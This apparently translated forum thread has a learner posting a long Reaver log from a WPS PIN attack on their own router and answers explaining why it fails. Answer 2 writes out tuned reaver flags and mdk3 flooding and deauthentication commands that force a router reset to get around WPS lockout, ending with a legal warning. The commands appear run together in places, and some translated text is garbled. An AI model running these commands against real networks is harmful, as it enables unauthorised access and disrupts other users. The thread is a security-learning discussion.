我正在学习网络安全。这次我尝试利用路由器上的 WPS 来渗透测试我的路由器。
这是我的路由器的统计数据
BSSID Ch dBm WPS Lck Vendor ESSID
--------------------------------------------------------------------------------
5C:03:39:40:33:FC 1 -25 2.0 No W04_5C03394033FC
dBm由于路由器和网络适配器紧挨着,所以功率确实很高:)
我已将路由器的 WPS PIN 设置为12345670。我不想浪费时间最终获得正确的 PIN,我只是想看看获得正确 PIN 后会发生什么。
我已将适配器设置为监控模式,并使用以下命令启动了 Reaver:
reaver -b 5C:03:39:40:33:FC -c 1 -vv -i wlan0mon
控制台输出(我让它运行约 20 秒):
root@kali:~# reaver -b 5C:03:39:40:33:FC -c 1 -vv -i wlan0mon -O /root/Desktop/Dumps/rever_test
Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Switching wlan0mon to channel 1
[+] Waiting for beacon from 5C:03:39:40:33:FC
[+] Received beacon from 5C:03:39:40:33:FC
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2020-07-23 10:19:40 (0 seconds/pin)
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
它说正在尝试输入 PIN,但没有任何结果。我测试过 WPS 是否被锁定,但并没有。我不确定问题出在哪里,我很想知道为什么会发生这种情况。
我在 Kali 上运行此测试,适配器支持监控模式和注入。
答案1
您使用的路由器固件中已修补 WPS。这些攻击主要通过以下方式获得成功:微软WP1.0。
还有一些事情您仍然可以尝试。
此路由器可能正在使用 MAC 锁,请尝试随机化 Mac 地址,看看是否是无线适配器被锁定。
在 Reaver 中禁用 NACK
在 reaver 中尝试 wpspixie
根据所用的卡和驱动程序,reaver 并不总是能正确显示锁定的接入点。我想到的是我的 ralink 卡……(EAPOL 启动请求后的超时是一个很好的指示。)
您可以尝试使用无线网络(取决于 Kali 版本)查看它是否显示您的路由器已锁定,我的一些在 reaver 中未显示 AP 锁定的卡将在 wifite 中正确显示。这实际上取决于所使用的卡和驱动程序。
编辑:根据 Kali 的版本(我说的是几年前的版本),如果没有同时运行 airodump-ng,reaver 将无法正确捕获响应。这个警告似乎在较新的版本中得到了修复,但可能值得一试。
答案2
简短回答:
您需要遵循reaver更为复杂的规则:
reaver -i wlan0 -c 1 -b TARGET_ROUTER_MAC -vv -L -N -d 15 -T .5 -r 3:20
你将要无论如何,尝试 3-4 次后锁定路由器。尝试 1-2 次后更改适配器的 MAC 不会有帮助。
您需要重置路由器以重置锁定状态。
您可以通过运行以下 5 个操作来实现这一点(您需要打开 5 个新的终端窗口并同时运行它们)来源:
mdk3 monX a -a xx:xx:xx:xx:xx:xx -mmdk3 monX m -t xx:xx:xx:xx:xx:xxmdk3 monX d -b blacklist -c Xmdk3 monX b -t xx:xx:xx:xx:xx:xx -c Xwash -i monX -C
这种方法不适用于所有路由器。但值得一试。
较长的版本:
我不得不花点时间才能弄清楚事情的真相。
我问了几个朋友,他们是否有旧路由器,这样我就有更多的东西可以利用。
我总共测试了 7 种不同的路由器。它们的芯片组如下:
AtherosCRealtekSRalinkTeBroadcom- 一台 Buffalo 路由器返回结果为
Unknown
一些路由器有 WPS 1.0,一些有 WPS 2.0。
我的适配器是 Panda PAU05。带有支持注入的芯片组。注入成功率为 94% 到 100%。
笔记:PAU05亚马逊上出售的新适配器带有不同的芯片组,不支持注入(芯片组RT5372)。 来源
我没有测试较弱信号下的数据包丢失。所有路由器都放在我的桌子上,就在适配器的旁边。因此信号比通常情况下要好得多,但对于我的测试来说这并不重要。
因此,使用我最初发布的命令运行测试没有任何结果。我一边吃午饭一边让它运行了大约 40 分钟,我可以看到它尝试了第二个 PIN,但基本上所有路由器都忽略了它。
经过进一步研究,我决定尝试不同的设置。为了显得更“人性化”,我尝试在流程的不同步骤中添加超时。好消息是 - 我的测试取得了一些进展。但测试一个 PIN 需要大约 40-70 秒。总共可能有 11000 个 PIN 组合,破解需要大约 9 天的时间。但可能更接近 4-5 天,因为您可能会更快地获得正确的组合。
但问题是,我尝试了 3-4 次后就被锁定在路由器之外了!(WPS 2.0)
我尝试使用 WPS 1.0 的另一个路由器,在尝试约 20 次后被锁定。
您会知道自己已被锁定,因为 reaver 会尝试再次使用第一个 PIN 12345670。此外,如果您运行,wash -i YOUR_ADAPTER_INTERFACE您会看到路由器已被锁定。
好的,那么可能是因为客户端尝试的次数太多了?或者可能是因为我应该更改我的 MAC 来模拟真实用户?我使用不同的 WiFi 卡登录到该路由器,并将我的 MAC 更改为“真实用户”。尝试几次后仍然被锁定。
所以也许我应该写一个脚本,每次我尝试输入 PIN 时,都会将我的 MAC 更改为随机的 MAC?不,还是被锁定了。
在手动重置路由器很多次之后,我认为在现实生活中这种情况不会起作用。那么黑客会如何利用这一点呢?WPS 终于安全了吗?
在查阅了 Kali 论坛后,我找到了方法通过向路由器发送垃圾邮件直到其重置来重置路由器。由于我测试的所有路由器都是我朋友在升级之前使用的旧路由器,因此它们都很容易重置。尽管最初的论坛帖子说它可能并不总是有效。
所以我编写了一个新脚本,基本上可以让 Reaver 以更长的延迟运行,以显示人性化。检查 Reaver 何时尝试使用起始 PIN,重置路由器,然后重新执行。
后来我重写了脚本,使用crunch密码生成工具中的 PIN。然后使用标志运行 reaver -p PIN。然后我使用模式运行 crunch,其中正确的 PIN 是第一个(您可以使用模式选项并在模式的最后一个位置仅提供一个字符来生成)。基本上,重新进行测试并确保一切都从起点开始需要大量时间,所以我只是想看看最终结果。
嗯,成功了。但即使不分析日志,这种攻击也非常明显——每隔一段时间,你的路由器就会开始将你踢出并重新启动。
总的来说,我仍将进行更多测试,看看是否可以改变某些步骤以更多地使用reaver或之类的工具bully。
我会将我的答案标记为正确答案,因为我得到了想要的结果,但我对性能并不满意。我真的希望能够在约 10 分钟内而不是约 2 周内获得访问权限。因此,如果有更好的方法,我很乐意接受其他答案。
这是常识,但以防万一,在许多国家,入侵他人网络、重启路由器、踢出他人等都是违法的。
了解安全知识固然很好,但如果你用它来冒犯他人——那是你的错。